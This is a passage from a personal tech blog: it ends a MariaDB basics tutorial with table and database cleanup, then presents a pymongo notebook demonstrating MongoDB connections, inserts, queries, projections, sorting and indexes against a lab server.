</div><p>Realistically, I could have just dropped the table.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">MariaDB [securitynik_db]> DROP TABLE interesting_data;</span>
<span style="color: white;">Query OK, 0 rows affected (0.022 sec)</span>
<span style="color: white;">MariaDB [securitynik_db]> SHOW TABLES;</span>
<span style="color: white;">Empty set (0.000 sec)</span><span style="font-family: Times New Roman;"><span style="white-space: normal;">
</span></span></pre></div>
<p></p><div><div>Time to drop the database and close up shop.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">MariaDB [securitynik_db]> SHOW DATABASES;</span>
<span style="color: white;">+--------------------+</span>
<span style="color: white;">| Database           |</span>
<span style="color: white;">+--------------------+</span>
<span style="color: white;">| information_schema |</span>
<span style="color: white;">| mysql              |</span>
<span style="color: white;">| performance_schema |</span>
<span style="color: white;">| securitynik_db     |</span>
<span style="color: white;">| sys                |</span>
<span style="color: white;">+--------------------+</span>
<span style="color: white;">5 rows in set (0.000 sec)</span>
<span style="color: white;">MariaDB [securitynik_db]> DROP DATABASE securitynik_db;</span>
<span style="color: white;">Query OK, 0 rows affected (0.013 sec)</span>
<span style="color: white;">MariaDB [(none)]> SHOW DATABASES;</span>
<span style="color: white;">+--------------------+</span>
<span style="color: white;">| Database           |</span>
<span style="color: white;">+--------------------+</span>
<span style="color: white;">| information_schema |</span>
<span style="color: white;">| mysql              |</span>
<span style="color: white;">| performance_schema |</span>
<span style="color: white;">| sys                |</span>
<span style="color: white;">+--------------------+</span>
<span style="color: white;">4 rows in set (0.000 sec)</span>
</pre></div>
</div><p>That's it!</p><p>References:</p><p><a href="https://dev.mysql.com/doc/refman/8.0/en/" target="_blank">https://dev.mysql.com/doc/refman/8.0/en/<br /></a><a href="https://www.mysqltutorial.org/" target="_blank">https://www.mysqltutorial.org/<br /></a><a href="https://www.w3schools.com/mysql/mysql_create_table.asp" target="_blank">https://www.w3schools.com/mysql/mysql_create_table.asp<br /></a><a href="https://www.mysqltutorial.org/mysql-show-columns/" target="_blank">https://www.mysqltutorial.org/mysql-show-columns/<br /></a><a href="https://www.rosehosting.com/blog/mysql-show-users/" target="_blank">https://www.rosehosting.com/blog/mysql-show-users/<br /></a><a href="https://www.softwaretestinghelp.com/mysql-create-user/" target="_blank">https://www.softwaretestinghelp.com/mysql-create-user/<br /></a><a href="https://mariadb.com/kb/en/create-user/" target="_blank">https://mariadb.com/kb/en/create-user/<br /></a><a href="https://mariadb.com/kb/en/error-log/" target="_blank">https://mariadb.com/kb/en/error-log/<br /></a><a href="https://mariadb.com/kb/en/mysqluser-table/" target="_blank">https://mariadb.com/kb/en/mysqluser-table/</a></p><p><br /></p></div>Nik Alleyne, MSc | CISSP | GC|IA|IH|REM|PENhttp://www.blogger.com/profile/10282323977269843041noreply@blogger.com0tag:blogger.com,1999:blog-7303400454979750101.post-30536453486754623802022-04-28T19:44:00.001-07:002022-04-28T19:45:18.219-07:00Beginning MongoDB - MongoClientTo see the <a href="https://github.com/SecurityNik/Data-Science-and-ML/blob/main/Beginning%20MongoDb.ipynb" target="_blank">full notebook</a>, check out my GitHub site.<div><br /></div><div> <!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;"><span style="background-color: #0f140f; color: #008800; font-style: italic;"># %%</span>
239</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span style="background-color: #0f140f; color: #008800; font-style: italic;"># %%</span>
<span style="background-color: #0f140f; color: #008800; font-style: italic;"># Import the needed libraries</span>
<span style="color: #fb660a; font-weight: bold;">import</span> <span style="color: white;">requests</span>
<span style="color: #fb660a; font-weight: bold;">from</span> <span style="color: white;">pymongo</span> <span style="color: #fb660a; font-weight: bold;">import</span> <span style="color: white;">MongoClient</span>
<span style="background-color: #0f140f; color: #008800; font-style: italic;"># %%</span>
<span style="background-color: #0f140f; color: #008800; font-style: italic;"># Setup the connection to the mongodb server</span>
<span style="color: white;">mongodb_client</span> <span style="color: white;">=</span> <span style="color: white;">MongoClient(</span><span style="color: #0086d2;">'10.0.0.120'</span><span style="color: white;">,</span> <span style="color: #0086f7; font-weight: bold;">27017</span><span style="color: white;">)</span>
<span style="color: white;">mongodb_client</span>
<span style="background-color: #0f140f; color: #008800; font-style: italic;"># %%</span>
<span style="background-color: #0f140f; color: #008800; font-style: italic;"># Ping </span>
<span style="color: white;">mongodb_client.admin.command(</span><span style="color: #0086d2;">'ping'</span><span style="color: white;">)</span>
<span style="background-color: #0f140f; color: #008800; font-style: italic;"># %%</span>
<span style="background-color: #0f140f; color: #008800; font-style: italic;"># List the databases on the server</span>
<span style="color: white;">mongodb_client.list_database_names()</span>
<span style="background-color: #0f140f; color: #008800; font-style: italic;"># %%</span>
<span style="background-color: #0f140f; color: #008800; font-style: italic;"># List all collections in the securitynik database</span>
<span style="color: white;">securitynik_db</span> <span style="color: white;">=</span> <span style="color: white;">mongodb_client[</span><span style="color: #0086d2;">'securitynik-mongo-db'</span><span style="color: white;">]</span>
<span style="color: white;">securitynik_db.list_collection_names()</span>
<span style="background-color: #0f140f; color: #008800; font-style: italic;"># %%</span>
<span style="background-color: #0f140f; color: #008800; font-style: italic;"># Get the (host, port) the client is currently connected to</span>
<span style="color: white;">mongodb_client.address</span>
<span style="background-color: #0f140f; color: #008800; font-style: italic;"># %%</span>
<span style="background-color: #0f140f; color: #008800; font-style: italic;"># Get the field names of the first document in the employees collection (empty list if it has no documents yet)</span>
<span style="color: white;">first_doc</span> <span style="color: white;">=</span> <span style="color: white;">securitynik_db.employees.find_one()</span>
<span style="color: white;">list(first_doc.keys())</span> <span style="color: #fb660a; font-weight: bold;">if</span> <span style="color: white;">first_doc</span> <span style="color: #fb660a; font-weight: bold;">else</span> <span style="color: white;">[]</span>
<span style="background-color: #0f140f; color: #008800; font-style: italic;"># %%</span>
<span style="background-color: #0f140f; color: #008800; font-style: italic;"># Get a handle to the employees collection within securitynik_db (MongoDB creates it on first insert)</span>
<span style="color: white;">employees</span> <span style="color: white;">=</span> <span style="color: white;">securitynik_db.employees</span>
<span style="background-color: #0f140f; color: #008800; font-style: italic;"># Get a handle to the users collection</span>
<span style="color: white;">users</span> <span style="color: white;">=</span> <span style="color: white;">securitynik_db.users</span>
<span style="color: white;">securitynik_db,</span> <span style="color: white;">employees,</span> <span style="color: white;">users</span>
<span style="background-color: #0f140f; color: #008800; font-style: italic;"># %%</span>
<span style="color: white;">employee</span> <span style="color: white;">=</span> <span style="color: white;">{</span>
<span style="color: #0086d2;">'fname'</span> <span style="color: white;">:</span> <span style="color: #0086d2;">'Nik'</span><span style="color: white;">,</span>
<span style="color: #0086d2;">'lname'</span> <span style="color: white;">:</span> <span style="color: #0086d2;">'Alleyne'</span><span style="color: white;">,</span>
<span style="color: #0086d2;">'Active'</span> <span style="color: white;">:</span> <span style="color: #0086d2;">'True'</span><span style="color: white;">,</span>
<span style="color: #0086d2;">'profession'</span> <span style="color: white;">:</span> <span style="color: #0086d2;">'Blogger'</span>
<span style="color: white;">}</span>
<span style="background-color: #0f140f; color: #008800; font-style: italic;"># %%</span>
<span style="background-color: #0f140f; color: #008800; font-style: italic;"># Add a record to the employees collection</span>
<span style="color: white;">employees.insert_one(employee)</span>
<span style="background-color: #0f140f; color: #008800; font-style: italic;"># %%</span>
<span style="background-color: #0f140f; color: #008800; font-style: italic;"># Read the employee collection and print the first record</span>
<span style="color: white;">employees.find_one()</span>
<span style="background-color: #0f140f; color: #008800; font-style: italic;"># %%</span>
<span style="color: white;">insert_many</span> <span style="color: white;">=</span> <span style="color: white;">[</span>
<span style="color: white;">{</span><span style="color: #0086d2;">'user'</span><span style="color: white;">:</span><span style="color: #0086d2;">'NA'</span><span style="color: white;">,</span> <span style="color: #0086d2;">'blog'</span><span style="color: white;">:</span><span style="color: #0086d2;">'www.blogspot.com'</span><span style="color: white;">,</span> <span style="color: #0086d2;">'age'</span><span style="color: white;">:</span><span style="color: #0086f7; font-weight: bold;">10</span><span style="color: white;">,</span> <span style="color: #0086d2;">'sex'</span><span style="color: white;">:</span><span style="color: #0086d2;">'Female'</span><span style="color: white;">},</span>
<span style="color: white;">{</span><span style="color: #0086d2;">'user'</span><span style="color: white;">:</span><span style="color: #0086d2;">'NA'</span><span style="color: white;">,</span> <span style="color: #0086d2;">'blog'</span><span style="color: white;">:</span><span style="color: #0086d2;">'www.blogspot.com'</span><span style="color: white;">,</span> <span style="color: #0086d2;">'age'</span><span style="color: white;">:</span><span style="color: #0086f7; font-weight: bold;">20</span><span style="color: white;">,</span> <span style="color: #0086d2;">'sex'</span><span style="color: white;">:</span><span style="color: #0086d2;">'Male'</span><span style="color: white;">},</span>
<span style="color: white;">{</span><span style="color: #0086d2;">'user'</span><span style="color: white;">:</span><span style="color: #0086d2;">'SA'</span><span style="color: white;">,</span> <span style="color: #0086d2;">'blog'</span><span style="color: white;">:</span><span style="color: #0086d2;">'www.blogspot.com'</span><span style="color: white;">,</span> <span style="color: #0086d2;">'age'</span><span style="color: white;">:</span><span style="color: #0086f7; font-weight: bold;">30</span><span style="color: white;">,</span> <span style="color: #0086d2;">'sex'</span><span style="color: white;">:</span><span style="color: #0086d2;">'Female'</span><span style="color: white;">},</span>
<span style="color: white;">{</span><span style="color: #0086d2;">'user'</span><span style="color: white;">:</span><span style="color: #0086d2;">'TQ'</span><span style="color: white;">,</span> <span style="color: #0086d2;">'blog'</span><span style="color: white;">:</span><span style="color: #0086d2;">'www.blogspot.com'</span><span style="color: white;">,</span> <span style="color: #0086d2;">'age'</span><span style="color: white;">:</span><span style="color: #0086f7; font-weight: bold;">40</span><span style="color: white;">,</span> <span style="color: #0086d2;">'sex'</span><span style="color: white;">:</span><span style="color: #0086d2;">'Male'</span><span style="color: white;">},</span>
<span style="color: white;">{</span><span style="color: #0086d2;">'user'</span><span style="color: white;">:</span><span style="color: #0086d2;">'DP'</span><span style="color: white;">,</span> <span style="color: #0086d2;">'blog'</span><span style="color: white;">:</span><span style="color: #0086d2;">'www.blogspot.com'</span><span style="color: white;">,</span> <span style="color: #0086d2;">'age'</span><span style="color: white;">:</span><span style="color: #0086f7; font-weight: bold;">50</span><span style="color: white;">,</span> <span style="color: #0086d2;">'sex'</span><span style="color: white;">:</span><span style="color: #0086d2;">'Female'</span><span style="color: white;">},</span>
<span style="color: white;">{</span><span style="color: #0086d2;">'user'</span><span style="color: white;">:</span><span style="color: #0086d2;">'TA'</span><span style="color: white;">,</span> <span style="color: #0086d2;">'blog'</span><span style="color: white;">:</span><span style="color: #0086d2;">'www.blogspot.com'</span><span style="color: white;">,</span> <span style="color: #0086d2;">'age'</span><span style="color: white;">:</span><span style="color: #0086f7; font-weight: bold;">60</span><span style="color: white;">,</span> <span style="color: #0086d2;">'sex'</span><span style="color: white;">:</span><span style="color: #0086d2;">'Male'</span><span style="color: white;">},</span>
<span style="color: white;">{</span><span style="color: #0086d2;">'user'</span><span style="color: white;">:</span><span style="color: #0086d2;">'PK'</span><span style="color: white;">,</span> <span style="color: #0086d2;">'blog'</span><span style="color: white;">:</span><span style="color: #0086d2;">'www.blogspot.com'</span><span style="color: white;">,</span> <span style="color: #0086d2;">'age'</span><span style="color: white;">:</span><span style="color: #0086f7; font-weight: bold;">70</span><span style="color: white;">,</span> <span style="color: #0086d2;">'sex'</span><span style="color: white;">:</span><span style="color: #0086d2;">'Female'</span><span style="color: white;">},</span>
<span style="color: white;">{</span><span style="color: #0086d2;">'user'</span><span style="color: white;">:</span><span style="color: #0086d2;">'User-1'</span><span style="color: white;">,</span> <span style="color: #0086d2;">'blog'</span><span style="color: white;">:</span><span style="color: #0086d2;">'www.blogspot.com'</span><span style="color: white;">,</span> <span style="color: #0086d2;">'age'</span><span style="color: white;">:</span><span style="color: #0086f7; font-weight: bold;">80</span><span style="color: white;">,</span> <span style="color: #0086d2;">'sex'</span><span style="color: white;">:</span><span style="color: #0086d2;">'Male'</span><span style="color: white;">},</span>
<span style="color: white;">{</span><span style="color: #0086d2;">'user'</span><span style="color: white;">:</span><span style="color: #0086d2;">'User-2'</span><span style="color: white;">,</span> <span style="color: #0086d2;">'blog'</span><span style="color: white;">:</span><span style="color: #0086d2;">'www.blogspot.com'</span><span style="color: white;">,</span> <span style="color: #0086d2;">'age'</span><span style="color: white;">:</span><span style="color: #0086f7; font-weight: bold;">90</span><span style="color: white;">,</span> <span style="color: #0086d2;">'sex'</span><span style="color: white;">:</span><span style="color: #0086d2;">'Female'</span><span style="color: white;">},</span>
<span style="color: white;">{</span><span style="color: #0086d2;">'user'</span><span style="color: white;">:</span><span style="color: #0086d2;">'User-3'</span><span style="color: white;">,</span> <span style="color: #0086d2;">'blog'</span><span style="color: white;">:</span><span style="color: #0086d2;">'www.blogspot.com'</span><span style="color: white;">,</span> <span style="color: #0086d2;">'age'</span><span style="color: white;">:</span><span style="color: #0086f7; font-weight: bold;">1000</span><span style="color: white;">,</span> <span style="color: #0086d2;">'sex'</span><span style="color: white;">:</span><span style="color: #0086d2;">'Male'</span><span style="color: white;">},</span>
<span style="color: white;">]</span>
<span style="background-color: #0f140f; color: #008800; font-style: italic;"># %%</span>
<span style="background-color: #0f140f; color: #008800; font-style: italic;"># Insert the above records</span>
<span style="color: white;">employees.insert_many(insert_many)</span>
<span style="background-color: #0f140f; color: #008800; font-style: italic;"># %%</span>
<span style="background-color: #0f140f; color: #008800; font-style: italic;"># Leveraging the query operators</span>
<span style="color: #fb660a; font-weight: bold;">for</span> <span style="color: white;">document</span> <span style="color: white;">in</span> <span style="color: white;">securitynik_db.employees.find({}):</span>
<span style="color: white;">print(document)</span>
<span style="background-color: #0f140f; color: #008800; font-style: italic;"># %%</span>
<span style="background-color: #0f140f; color: #008800; font-style: italic;"># Count the number of documents in the users and employees table</span>
<span style="color: white;">securitynik_db.user.count_documents({}),</span> <span style="color: white;">securitynik_db.employees.count_documents(filter={})</span>
<span style="background-color: #0f140f; color: #008800; font-style: italic;"># %%</span>
<span style="background-color: #0f140f; color: #008800; font-style: italic;"># Find one record</span>
<span style="color: white;">securitynik_db.employees.find_one(filter={})</span>
<span style="background-color: #0f140f; color: #008800; font-style: italic;"># %%</span>
<span style="background-color: #0f140f; color: #008800; font-style: italic;"># Count all records where the sex is male</span>
<span style="color: white;">securitynik_db.employees.count_documents({</span><span style="color: #0086d2;">'sex'</span><span style="color: white;">:</span><span style="color: #0086d2;">'Male'</span><span style="color: white;">})</span>
<span style="background-color: #0f140f; color: #008800; font-style: italic;"># %%</span>
<span style="background-color: #0f140f; color: #008800; font-style: italic;"># Count all records where the sex is Female</span>
<span style="color: white;">securitynik_db.employees.count_documents({</span><span style="color: #0086d2;">'sex'</span><span style="color: white;">:</span><span style="color: #0086d2;">'Female'</span><span style="color: white;">})</span>
<span style="background-color: #0f140f; color: #008800; font-style: italic;"># %%</span>
<span style="background-color: #0f140f; color: #008800; font-style: italic;"># Combining the filter to look for a more targeted record</span>
<span style="color: white;">securitynik_db.employees.count_documents({</span><span style="color: #0086d2;">'sex'</span><span style="color: white;">:</span><span style="color: #0086d2;">'Female'</span><span style="color: white;">,</span> <span style="color: #0086d2;">'age'</span><span style="color: white;">:</span><span style="color: #0086f7; font-weight: bold;">90</span><span style="color: white;">,</span> <span style="color: #0086d2;">'user'</span><span style="color: white;">:</span><span style="color: #0086d2;">'User-2'</span><span style="color: white;">})</span>
<span style="background-color: #0f140f; color: #008800; font-style: italic;"># %%</span>
<span style="background-color: #0f140f; color: #008800; font-style: italic;"># Find the record that matches the above criterion</span>
<span style="color: white;">securitynik_db.employees.find_one({</span><span style="color: #0086d2;">'sex'</span><span style="color: white;">:</span><span style="color: #0086d2;">'Female'</span><span style="color: white;">,</span> <span style="color: #0086d2;">'age'</span><span style="color: white;">:</span><span style="color: #0086f7; font-weight: bold;">90</span><span style="color: white;">,</span> <span style="color: #0086d2;">'user'</span><span style="color: white;">:</span><span style="color: #0086d2;">'User-2'</span><span style="color: white;">})</span>
<span style="background-color: #0f140f; color: #008800; font-style: italic;"># %%</span>
<span style="background-color: #0f140f; color: #008800; font-style: italic;"># Leveraging the query to find all records where the age is equal to 20</span>
<span style="color: #fb660a; font-weight: bold;">for</span> <span style="color: white;">document</span> <span style="color: white;">in</span> <span style="color: white;">securitynik_db.employees.find({</span> <span style="color: #0086d2;">'age'</span> <span style="color: white;">:</span> <span style="color: white;">{</span> <span style="color: #0086d2;">'$eq'</span><span style="color: white;">:</span><span style="color: #0086f7; font-weight: bold;">20</span> <span style="color: white;">}</span> <span style="color: white;">}):</span>
<span style="color: white;">print(document)</span>
<span style="background-color: #0f140f; color: #008800; font-style: italic;"># %%</span>
<span style="background-color: #0f140f; color: #008800; font-style: italic;"># Leveraging the query to find all records where the age is less than 20</span>
<span style="color: #fb660a; font-weight: bold;">for</span> <span style="color: white;">document</span> <span style="color: white;">in</span> <span style="color: white;">securitynik_db.employees.find({</span> <span style="color: #0086d2;">'age'</span> <span style="color: white;">:</span> <span style="color: white;">{</span> <span style="color: #0086d2;">'$lt'</span><span style="color: white;">:</span><span style="color: #0086f7; font-weight: bold;">20</span> <span style="color: white;">}</span> <span style="color: white;">}):</span>
<span style="color: white;">print(document)</span>
<span style="background-color: #0f140f; color: #008800; font-style: italic;"># %%</span>
<span style="background-color: #0f140f; color: #008800; font-style: italic;"># Leveraging the query to find all records where the age is greater than 20</span>
<span style="color: #fb660a; font-weight: bold;">for</span> <span style="color: white;">document</span> <span style="color: white;">in</span> <span style="color: white;">securitynik_db.employees.find({</span> <span style="color: #0086d2;">'age'</span> <span style="color: white;">:</span> <span style="color: white;">{</span> <span style="color: #0086d2;">'$gt'</span><span style="color: white;">:</span><span style="color: #0086f7; font-weight: bold;">80</span> <span style="color: white;">}</span> <span style="color: white;">}):</span>
<span style="color: white;">print(document)</span>
<span style="background-color: #0f140f; color: #008800; font-style: italic;"># %%</span>
<span style="background-color: #0f140f; color: #008800; font-style: italic;"># Leveraging the query to find all records within an array</span>
<span style="color: #fb660a; font-weight: bold;">for</span> <span style="color: white;">document</span> <span style="color: white;">in</span> <span style="color: white;">securitynik_db.employees.find({</span> <span style="color: #0086d2;">'age'</span> <span style="color: white;">:</span> <span style="color: white;">{</span> <span style="color: #0086d2;">'$in'</span><span style="color: white;">:[</span><span style="color: #0086f7; font-weight: bold;">90</span><span style="color: white;">,</span> <span style="color: #0086f7; font-weight: bold;">1000</span><span style="color: white;">]</span> <span style="color: white;">}</span> <span style="color: white;">}):</span>
<span style="color: white;">print(document)</span>
<span style="background-color: #0f140f; color: #008800; font-style: italic;"># %%</span>
<span style="background-color: #0f140f; color: #008800; font-style: italic;"># Leveraging the query to find all records not within an array</span>
<span style="color: #fb660a; font-weight: bold;">for</span> <span style="color: white;">document</span> <span style="color: white;">in</span> <span style="color: white;">securitynik_db.employees.find({</span> <span style="color: #0086d2;">'age'</span> <span style="color: white;">:</span> <span style="color: white;">{</span> <span style="color: #0086d2;">'$nin'</span><span style="color: white;">:[</span><span style="color: #0086f7; font-weight: bold;">90</span><span style="color: white;">,</span> <span style="color: #0086f7; font-weight: bold;">1000</span><span style="color: white;">]</span> <span style="color: white;">}</span> <span style="color: white;">}):</span>
<span style="color: white;">print(document)</span>
<span style="background-color: #0f140f; color: #008800; font-style: italic;"># %%</span>
<span style="background-color: #0f140f; color: #008800; font-style: italic;"># Leveraging the query to find all records where the blogsOn field exists</span>
<span style="background-color: #0f140f; color: #008800; font-style: italic;"># $exists takes a boolean; a string such as 'true' is merely truthy, so 'false' would match as well</span>
<span style="color: #fb660a; font-weight: bold;">for</span> <span style="color: white;">document</span> <span style="color: white;">in</span> <span style="color: white;">securitynik_db.employees.find({</span> <span style="color: #0086d2;">'blogsOn'</span> <span style="color: white;">:</span> <span style="color: white;">{</span> <span style="color: #0086d2;">'$exists'</span><span style="color: white;">:</span> <span style="color: #fb660a; font-weight: bold;">True</span> <span style="color: white;">}</span> <span style="color: white;">}):</span>
<span style="color: white;">print(document)</span>
<span style="background-color: #0f140f; color: #008800; font-style: italic;"># %%</span>
<span style="background-color: #0f140f; color: #008800; font-style: italic;"># Leveraging the query to find all records where the blogsOn field exists and has 2 or more entries</span>
<span style="background-color: #0f140f; color: #008800; font-style: italic;"># in the blogsOn field (blogsOn.1 is the second array element)</span>
<span style="color: #fb660a; font-weight: bold;">for</span> <span style="color: white;">document</span> <span style="color: white;">in</span> <span style="color: white;">securitynik_db.employees.find({</span> <span style="color: #0086d2;">'blogsOn.1'</span> <span style="color: white;">:</span> <span style="color: white;">{</span> <span style="color: #0086d2;">'$exists'</span><span style="color: white;">:</span> <span style="color: #fb660a; font-weight: bold;">True</span> <span style="color: white;">}</span> <span style="color: white;">}):</span>
<span style="color: white;">print(document)</span>
<span style="background-color: #0f140f; color: #008800; font-style: italic;"># %%</span>
<span style="background-color: #0f140f; color: #008800; font-style: italic;"># finding all the unique values for the blogsOn field</span>
<span style="color: white;">securitynik_db.employees.distinct(</span><span style="color: #0086d2;">'blogsOn'</span><span style="color: white;">)</span>
<span style="background-color: #0f140f; color: #008800; font-style: italic;"># %%</span>
<span style="background-color: #0f140f; color: #008800; font-style: italic;"># finding all the unique values for the sex field</span>
<span style="color: white;">securitynik_db.employees.distinct(</span><span style="color: #0086d2;">'sex'</span><span style="color: white;">)</span>
<span style="background-color: #0f140f; color: #008800; font-style: italic;"># %%</span>
<span style="background-color: #0f140f; color: #008800; font-style: italic;"># finding all the unique values for the user field in the users collection</span>
<span style="color: white;">securitynik_db.user.distinct(</span><span style="color: #0086d2;">'user'</span><span style="color: white;">)</span>
<span style="background-color: #0f140f; color: #008800; font-style: italic;"># %%</span>
<span style="background-color: #0f140f; color: #008800; font-style: italic;"># Using distinct with regular expressions</span>
<span style="background-color: #0f140f; color: #008800; font-style: italic;"># Looking for all records where the user starts with</span>
<span style="background-color: #0f140f; color: #008800; font-style: italic;"># Nak, Ney, Pam or contains the characters sadi and ends with Alleyne</span>
<span style="background-color: #0f140f; color: #008800; font-style: italic;"># While ignoring case (raw string, so \w is not treated as a Python escape)</span>
<span style="color: white;">securitynik_db.user.distinct(</span><span style="color: #0086d2;">'user'</span><span style="color: white;">,</span> <span style="color: white;">{</span> <span style="color: #0086d2;">'user'</span> <span style="color: white;">:</span> <span style="color: white;">{</span><span style="color: #0086d2;">'$regex'</span> <span style="color: white;">:</span> <span style="color: #0086d2;">r'^(Nak\w+|Ney|Pam|.*sadi).*alleyne$'</span><span style="color: white;">,</span> <span style="color: #0086d2;">'$options'</span><span style="color: white;">:</span> <span style="color: #0086d2;">'i'</span><span style="color: white;">}</span> <span style="color: white;">})</span>
<span style="background-color: #0f140f; color: #008800; font-style: italic;"># %%</span>
<span style="background-color: #0f140f; color: #008800; font-style: italic;"># Leveraging projections to find the fields of interest</span>
<span style="background-color: #0f140f; color: #008800; font-style: italic;"># Then return only the columns of interest</span>
<span style="background-color: #0f140f; color: #008800; font-style: italic;"># 1 means return the field, id is returned by default, </span>
<span style="background-color: #0f140f; color: #008800; font-style: italic;"># so using 0 to suppress it.</span>
<span style="color: white;">list(securitynik_db.employees.find(filter={},</span> <span style="color: white;">projection={</span><span style="color: #0086d2;">'_id'</span><span style="color: white;">:</span><span style="color: #0086f7; font-weight: bold;">0</span><span style="color: white;">,</span> <span style="color: #0086d2;">'fname'</span><span style="color: white;">:</span><span style="color: #0086f7; font-weight: bold;">1</span><span style="color: white;">,</span> <span style="color: #0086d2;">'lname'</span><span style="color: white;">:</span><span style="color: #0086f7; font-weight: bold;">1</span><span style="color: white;">}))</span>
<span style="background-color: #0f140f; color: #008800; font-style: italic;"># %%</span>
<span style="background-color: #0f140f; color: #008800; font-style: italic;"># Expanding on above to sort the results</span>
<span style="color: white;">sorted_docs</span> <span style="color: white;">=</span> <span style="color: white;">securitynik_db.employees.find({},</span> <span style="color: white;">sort=[(</span><span style="color: #0086d2;">'age'</span><span style="color: white;">,</span> <span style="color: white;">-</span><span style="color: #0086f7; font-weight: bold;">1</span><span style="color: white;">)])</span>
<span style="color: white;">list(sorted_docs)</span>
<span style="background-color: #0f140f; color: #008800; font-style: italic;"># %%</span>
<span style="background-color: #0f140f; color: #008800; font-style: italic;"># Expanding on above to sort the results</span>
<span style="color: white;">sorted_docs</span> <span style="color: white;">=</span> <span style="color: white;">securitynik_db.employees.find({</span><span style="color: #0086d2;">'fname'</span><span style="color: white;">:</span><span style="color: #0086d2;">'Nik'</span><span style="color: white;">},</span> <span style="color: white;">sort=[(</span><span style="color: #0086d2;">'_id'</span><span style="color: white;">,</span> <span style="color: white;">-</span><span style="color: #0086f7; font-weight: bold;">1</span><span style="color: white;">)])</span>
<span style="color: white;">list(sorted_docs)</span>
<span style="background-color: #0f140f; color: #008800; font-style: italic;"># %%</span>
<span style="background-color: #0f140f; color: #008800; font-style: italic;"># Limiting the number of returned records</span>
<span style="color: white;">sorted_docs</span> <span style="color: white;">=</span> <span style="color: white;">securitynik_db.employees.find({</span><span style="color: #0086d2;">'fname'</span><span style="color: white;">:</span><span style="color: #0086d2;">'Nik'</span><span style="color: white;">},</span> <span style="color: white;">sort=[(</span><span style="color: #0086d2;">'_id'</span><span style="color: white;">,</span> <span style="color: white;">-</span><span style="color: #0086f7; font-weight: bold;">1</span><span style="color: white;">)],</span> <span style="color: white;">limit=</span><span style="color: #0086f7; font-weight: bold;">1</span><span style="color: white;">)</span>
<span style="color: white;">list(sorted_docs)</span>
<span style="background-color: #0f140f; color: #008800; font-style: italic;"># %%</span>
<span style="background-color: #0f140f; color: #008800; font-style: italic;"># Limiting the number of returned records while taking advantage of skip</span>
<span style="color: white;">sorted_docs</span> <span style="color: white;">=</span> <span style="color: white;">securitynik_db.employees.find({</span><span style="color: #0086d2;">'fname'</span><span style="color: white;">:</span><span style="color: #0086d2;">'Nik'</span><span style="color: white;">},</span> <span style="color: white;">sort=[(</span><span style="color: #0086d2;">'_id'</span><span style="color: white;">,</span> <span style="color: white;">-</span><span style="color: #0086f7; font-weight: bold;">1</span><span style="color: white;">)],</span> <span style="color: white;">skip=</span><span style="color: #0086f7; font-weight: bold;">1</span><span style="color: white;">,</span> <span style="color: white;">limit=</span><span style="color: #0086f7; font-weight: bold;">1</span><span style="color: white;">)</span>
<span style="color: white;">list(sorted_docs)</span>
<span style="background-color: #0f140f; color: #008800; font-style: italic;"># %%</span>
<span style="background-color: #0f140f; color: #008800; font-style: italic;"># Creating an index and leveraging same</span>
<span style="color: white;">securitynik_db.employees.create_index([(</span><span style="color: #0086d2;">'age'</span><span style="color: white;">,</span> <span style="color: white;">-</span><span style="color: #0086f7; font-weight: bold;">1</span><span style="color: white;">)])</span>
<span style="background-color: #0f140f; color: #008800; font-style: italic;"># %%</span>
<span style="background-color: #0f140f; color: #008800; font-style: italic;"># Leverage the index by filtering on the indexed field (age)</span>
<span style="color: white;">list(securitynik_db.employees.find({</span><span style="color: #0086d2;">'age'</span><span style="color: white;">:</span> <span style="color: white;">-</span><span style="color: #0086f7; font-weight: bold;">1</span><span style="color: white;">}))</span>
<span style="background-color: #0f140f; color: #008800; font-style: italic;"># %%</span>
<span style="background-color: #0f140f; color: #008800; font-style: italic;"># Create a compound index</span>
<span style="color: white;">securitynik_db.employees.create_index([(</span><span style="color: #0086d2;">'age'</span><span style="color: white;">,</span> <span style="color: white;">-</span><span style="color: #0086f7; font-weight: bold;">1</span><span style="color: white;">),</span> <span style="color: white;">(</span><span style="color: #0086d2;">'fname'</span><span style="color: white;">,</span> <span style="color: white;">-</span><span style="color: #0086f7; font-weight: bold;">1</span><span style="color: white;">)])</span>
<span style="background-color: #0f140f; color: #008800; font-style: italic;"># %%</span>
<span style="background-color: #0f140f; color: #008800; font-style: italic;"># Grabbing initial information on the index</span>
<span style="color: white;">securitynik_db.employees.index_information()</span>
<span style="background-color: #0f140f; color: #008800; font-style: italic;"># %%</span>
<span style="background-color: #0f140f; color: #008800; font-style: italic;"># Getting an explanation about my query</span>
<span style="color: white;">securitynik_db.employees.find({</span><span style="color: #0086d2;">'fname'</span><span style="color: white;">:</span><span style="color: #0086d2;">'Nik'</span><span style="color: white;">,</span> <span style="color: #0086d2;">'_id'</span><span style="color: white;">:</span> <span style="color: #0086d2;">'6263735f43142a78a4071445'</span><span style="color: white;">}).explain()</span>
<span style="background-color: #0f140f; color: #008800; font-style: italic;"># %%</span>
<span style="background-color: #0f140f; color: #008800; font-style: italic;"># Using aggregate feature</span>
<span style="background-color: #0f140f; color: #008800; font-style: italic;"># doing most of the work at the server</span>
